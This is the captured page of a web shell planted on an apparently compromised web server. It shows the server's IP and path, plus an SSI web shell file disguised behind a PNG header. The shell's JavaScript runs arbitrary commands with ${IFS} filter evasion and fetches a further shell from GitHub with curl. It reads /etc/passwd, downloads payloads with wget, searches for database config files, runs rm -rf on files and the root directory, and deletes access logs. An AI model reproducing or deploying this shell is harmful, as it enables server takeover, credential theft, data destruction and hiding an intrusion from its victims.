Mr.Combet Webshell 🔥

Mr.Combet Webshell

Your IP : 18.118.186.62

Server IP : 185.136.159.155

Server : Linux 185-136-159-155.cprapid.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64

Server Software : Apache

PHP Version : 8.1.29

Add File : Submit

Add Directory : Submit

Dir : ~/home/jaibalajigroup/public_html/assets/front/img/summernote/

Edit File Name : 66369f0573b19.shtml

�PNG

���
IHDR���d���d���p�T���sBIT|d����>IDATx��1��� �Om/���������������������������������������������u������IEND�B`�







<html>
<head>
<title>SSI Webshell x</title>
<meta name="theme-color" content="#000">
<meta name="Author" content="Unknown45">
<meta name="description" content="Security ? that just an illusion - ">
<meta property="og:description" content="Security ? that just an illusion - ">
</head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/pace-js@latest/pace.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/pace-js@latest/pace-theme-default.min.css">
<script language="javascript">

function unknown45()
{
    var uri = document.getElementById('command').value;
    var rep = uri.replace(/[ ]/g,'${IFS}');
    var res = encodeURI(uri);
    document.location.href="?"+encodeURI(rep)+"&&test";
}

function refresh() {
    document.location.href="";
}

function checkfile() {
    document.location.href="?"+"ls${IFS}-la";
}

function readpass() {
    var selectedobj=document.getElementById('readpass');

if(selectedobj.className=='hide'){  //check if classname is hide 
        selectedobj.style.display = "block";
        selectedobj.readOnly=true;
        selectedobj.className ='show';
    }else{
        selectedobj.style.display = "none";
        selectedobj.className ='hide';
 }
}

function readnamed() {
    var selectedobj=document.getElementById('readnamed');

if(selectedobj.className=='hide'){  //check if classname is hide 
        selectedobj.style.display = "block";
        selectedobj.readOnly=true;
        selectedobj.className ='show';
    }else{
        selectedobj.style.display = "none";
        selectedobj.className ='hide';
 }
}

function movefiles() {
    var selectedobj=document.getElementById('movefiles');

if(selectedobj.className=='hide'){  //check if classname is hide 
        selectedobj.style.display = "block";
        selectedobj.readOnly=true;
        selectedobj.className ='show';
    }else{
        selectedobj.style.display = "none";
        selectedobj.className ='hide';
 }
}

function upfiles() {
    var selectedobj=document.getElementById('upfiles');

if(selectedobj.className=='hide'){  //check if classname is hide 
        selectedobj.style.display = "block";
        selectedobj.readOnly=true;
        selectedobj.className ='show';
    }else{
        selectedobj.style.display = "none";
        selectedobj.className ='hide';
 }
}

function renamefiles() {
    var selectedobj=document.getElementById('renamefiles');

if(selectedobj.className=='hide'){  //check if classname is hide 
        selectedobj.style.display = "block";
        selectedobj.readOnly=true;
        selectedobj.className ='show';
    }else{
        selectedobj.style.display = "none";
        selectedobj.className ='hide';
 }
}

function deletefiles() {
    var selectedobj=document.getElementById('deletefiles');

if(selectedobj.className=='hide'){  //check if classname is hide 
        selectedobj.style.display = "block";
        selectedobj.readOnly=true;
        selectedobj.className ='show';
    }else{
        selectedobj.style.display = "none";
        selectedobj.className ='hide';
 }
}

function findfiles() {
    var selectedobj=document.getElementById('findfiles');

if(selectedobj.className=='hide'){  //check if classname is hide 
        selectedobj.style.display = "block";
        selectedobj.readOnly=true;
        selectedobj.className ='show';
    }else{
        selectedobj.style.display = "none";
        selectedobj.className ='hide';
 }
}

function addupload()
{
    document.location.href="?"+"curl${IFS}-Ls${IFS}github.com/ohctcombet/-/raw/main/install.php${IFS}|${IFS}tee${IFS}-a${IFS}install.php";
}

function checkroot() {
    var uri = "ls -la ";
    var rep = uri.replace(/[ ]/g,'${IFS}');
    var res = encodeURI(uri);
    document.location.href="?"+encodeURI(rep)+"";
}

function deletelog() {
    var yakin = confirm("yakin hapus access logs nya ?");
    if (yakin == true) {
    var uri = "rm -rf ";
    var rep = uri.replace(/[ ]/g,'${IFS}');
    var res = encodeURI(uri);
    document.location.href="?"+encodeURI(rep)+"/../logs/ *";
} else {
    return true;
}
}

function delsel() {
    var uri = "rm -rf ";
    var rep = uri.replace(/[ ]/g,'${IFS}');
    var res = encodeURI(uri);
    document.location.href="?"+encodeURI(rep)+" |${IFS}clear${IFS}&&${IFS}echo${IFS}Done";
}

function movesatu()
{
    document.location.href="?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}../"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}../"+document.getElementById('movefile').value;
}

function movedua()
{
    document.location.href="?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}../../"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}../../"+document.getElementById('movefile').value;
}

function movetiga()
{
    document.location.href="?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}../../../"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}../../../"+document.getElementById('movefile').value;
}

function moveroot()
{
    document.location.href="?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}/"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}/"+document.getElementById('movefile').value;
}

function upfile()
{
    var url = document.getElementById('linknya').value;
    var https = url.split("https://").join("");
    var http = https.split("http://").join("");
    document.location.href="?"+"wget${IFS}"+encodeURI(http)+"${IFS}"+"--no-check-certificate${IFS}&&${IFS}ls${IFS}-la";
}

function renamefile()
{
    document.location.href="?"+"mv${IFS}"+document.getElementById('renameawal').value+"${IFS}"+document.getElementById('renameakhir').value+"${IFS}&&${IFS}ls${IFS}-la";
}

function deletefile()
{
    document.location.href="?"+"rm${IFS}-rf${IFS}"+document.getElementById('deletefile').value+"${IFS}&&${IFS}ls${IFS}-la";
}

function deleteinroot()
{
    var yakin = confirm("yakin hapus file ini di directory root ?");
    if (yakin == true) {
    document.location.href="?"+"rm${IFS}-rf${IFS}"+"/"+document.getElementById('deletefile').value+"${IFS}&&${IFS}ls${IFS}-la${IFS}";
} else {
    return true;
}
}

function deletefiledua()
{
    document.location.href="?"+"rm${IFS}-rf${IFS}"+document.getElementById('deletedir').value+"/"+document.getElementById('deletefiledua').value+"${IFS}&&${IFS}ls${IFS}-la${IFS}"+document.getElementById('deletedir').value;
}

function findfile()
{
    document.location.href="?"+"du${IFS}-ah${IFS}"+"|${IFS}grep${IFS}"+document.getElementById('findfile').value;
}

function findinroot()
{
    document.location.href="?"+"du${IFS}-ah${IFS}"+"${IFS}"+"|${IFS}grep${IFS}"+document.getElementById('findfile').value;
}

function findfiledua()
{
    document.location.href="?"+"du${IFS}-ah${IFS}"+document.getElementById('finddir').value+"${IFS}|${IFS}grep${IFS}"+document.getElementById('findfiledua').value;
}

function finddb()
{
    document.location.href="?"+"du${IFS}-ah${IFS}"+"${IFS}"+"|${IFS}grep${IFS}-e${IFS}config.php${IFS}-e${IFS}database.php${IFS}-e${IFS}config.inc.php${IFS}-e${IFS}koneksi.php";
}
</script>
<style type="text/css">
@import url('https://fonts.googleapis.com/css2?family=Kelly+Slab&display=swap');
.input {
background: transparent;
border-width: thin;
cursor: pointer;
border: 1.5px solid deeppink;
}
button {
    cursor: pointer;
    color: white;
    padding-left: 1rem;
    padding-right: 1rem;
    border: 1.5px solid #31ed06;
    border-radius: 5px;
    background-color: black;
    font-family: inherit;
    font-size: 16px;
}
button:hover {
color: lime;
border: 1.5px solid white;
}
.combet {
    outline: none;
    resize: none;
    font-family: 'Kelly Slab';
    background-color: transparent;
    border: 1.5px solid lime;
    border-radius: 5px;
    color: white;
    font-size: 1rem;
    margin: 1px;
}
</style>
</head>
<body onload="checkaja()" style="color: black;font-size: 0px;background: black;font-family: 'Kelly Slab';">
  <div style="text-align: center;font-size: 2rem;color: white;">
    <font>SSI WEBSHELL</font>
  </div>
  <div style="text-align: center;color: white;font-size: 1rem;padding-bottom: 7px;">
    <font>Command : </font>
    <input type=text size=60 id=command class="text" name="address1" style=" background-color: transparent;color: white;font-size: 1rem;border: 1.5px solid lime;border-radius: 5px;">&nbsp;
      <button class="input" id="gas" onclick="unknown45();">
        <span>Execute</span>
      </button>
    </div>
  <div style="border: 1.5px solid deeppink;border-radius: 5px;padding: 0.5rem;color: white;font-size: 1rem;">
    <font style="color: white;">Host : </font><font style="color: lime;">  </font><br />
    <font style="color: white;">Server Address : </font><font style="color: lime;">  </font><br />
    <font style="color: white;">User : </font><font style="color: lime;">  </font><br />
    <font style="color: white;">System : </font><font style="color: lime;">  </font><br />
    <font style="color: white;">Current Path : </font><font style="color: lime;">  </font><br />
  </div>
  <div style="padding-top:7px; color: white;font-size: 1rem;text-align: center;">
    <button onclick="refresh()">Refresh</button> 
    <button onclick="checkfile()">List File</button> 
    <button onclick="renamefiles()">Rename File</button> 
    <button onclick="movefiles()">Move File</button> 
    <button onclick="deletefiles()">Delete File</button> 
    <button onclick="findfiles()">Find File</button> 
    <button onclick="upfiles()">Upload File</button> 
    <button onclick="delsel()">Remove Shell</button>
  </div>
  <div style="padding-top:7px; padding-bottom:7px;color: white;font-size: 1rem;text-align: center;">
    <button onclick="readpass();">Read /etc/passwd</button> 
    <button onclick="readnamed();">Read /etc/named.conf</button> 
    <button onclick="addupload()">Upload Shell</button> 
    <button onclick="checkroot()">Check Root Directory</button> 
    <button onclick="deletelog()">Delete Access Logs</button>
  </div>
  <div style="border: 1.5px solid deeppink;border-radius: 5px;padding: 0.5rem;color: white;font-size: 1rem;">
    <font style="color: white;font-size: 1rem;">Executed Command : </font>
    <font id="cmd" style="color: white;font-size: 1rem;"></font><br />
    <textarea bgcolor=#e4e0d8 cols=121 rows=15 style="resize: none;font-family: 'Kelly Slab';background-color: transparent;width:99%;border: 1.5px solid lime;border-radius: 5px;padding: 0.5rem;color: white;font-size: 1rem;margin: 0.3rem;"></textarea>
<script>
    var cmd = document.getElementById("cmd").innerHTML.split("${IFS}").join(" ");
    document.getElementById("cmd").innerHTML = cmd;

var gaskan = document.getElementById("command");
    gaskan.addEventListener("keyup", function(event) {
    if (event.keyCode === 13) {
        event.preventDefault();
        document.getElementById("gas").click();
    }
});
</script>
<font id="readpass" style="display:none;color: white;font-size: 1rem;"><br>Read : <b>/etc/passwd</b><br>
    <textarea bgcolor="#e4e0d8" cols="121" rows="15" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;"></textarea>
</font>
<font id="readnamed" style="display:none;color: white;font-size: 1rem;"><br>Read : <b>/etc/named.conf</b><br>
    <textarea bgcolor=#e4e0d8 cols="121" rows="15" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;"></textarea>
</font>
<font id="movefiles" style="display:none;color: white;font-size: 1rem;"><br>Move File to <b>previous directory</b><br><br>
    filename : <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="movefile" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;" required></textarea>
    <button onclick="movesatu()">1 directory</button> <button onclick="movedua()">2 directory</button> <button onclick="movetiga()">3 directory</button> <button onclick="moveroot()">root directory</button>
</font>
<font id="renamefiles" style="display:none;color: white;font-size: 1rem;">Rename File :<br>
  <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="renameawal" class="combet" style="resize: none; outline: none" required></textarea> TO 
  <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="renameakhir" class="combet" style="resize: none; outline: none" required></textarea><br><button onclick="renamefile()">Gaskan</button>
</font>
<font id="upfiles" style="display:none;color: white;font-size: 1rem;"><br>Upload File<br><br>
    Link : <textarea bgcolor="#e4e0d8" cols="100" rows="1" id="linknya" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;" required></textarea> <button onclick="upfile()">Gaskan</button>
</font>
<font face="courier" size="2" id="deletefiles" style="display:none;color: white;font-size: 1rem;"><br>Delete <b>File</b><br>
    <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="deletefile" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;" required></textarea> 
<button onclick="deletefile()">Delete</button> <button onclick="deleteinroot()">Delete this in root directory</button><br><br>delete <b>file</b> in <b>custom directories</b><br><textarea bgcolor="#e4e0d8" cols="25" rows="1" id="deletefiledua" style="resize: none; outline: none" required></textarea> in directory <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="deletedir" style="resize: none; outline: none" required></textarea> <button onclick="deletefiledua()">Delete</button>
</font>
<font id="findfiles" style="display:none;color: white;font-size: 1rem;"><br>Find <b>Files</b><br>
    <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="findfile" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;" required></textarea> <button onclick="findfile()">Find</button> <button onclick="finddb()">find database location (beta)</button> <button onclick="findinroot()">Find this in root directory</button><br><br>find <b>files</b> in <b>custom directories</b><br><textarea bgcolor="#e4e0d8" cols="25" rows="1" id="findfiledua" style="resize: none; outline: none" required></textarea> in directory <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="finddir" style="resize: none; outline: none" required></textarea> <button onclick="findfiledua()">Find</button>
</font>
</div>
</body>
</html>